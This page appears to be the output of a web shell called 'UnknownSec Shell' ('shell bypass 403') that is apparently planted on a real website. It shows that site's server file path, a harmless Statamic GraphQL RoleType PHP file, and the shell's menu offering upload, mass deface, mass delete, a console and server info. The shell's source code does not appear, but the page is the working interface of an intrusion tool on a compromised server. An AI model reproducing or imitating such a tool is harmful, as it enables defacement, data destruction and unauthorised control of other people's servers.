shell bypass 403
UnknownSec Shell
:
/
home
/
forge
/
lolasweb.brannanatkinson.com
/
vendor
/
statamic
/
cms
/
src
/
GraphQL
/
Types
/ [
drwxrwxr-x
]
upload
mass deface
mass delete
console
info server
name :
RoleType.php
<?php namespace Statamic\GraphQL\Types; use Statamic\Facades\GraphQL; class RoleType extends \Rebing\GraphQL\Support\Type { const NAME = 'Role'; protected $attributes = [ 'name' => self::NAME, ]; public function fields(): array { return [ 'handle' => [ 'type' => GraphQL::string(), 'resolve' => function ($group) { return $group->handle(); }, ], 'title' => [ 'type' => GraphQL::string(), 'resolve' => function ($group) { return $group->title(); }, ], ]; } }
© 2026 UnknownSec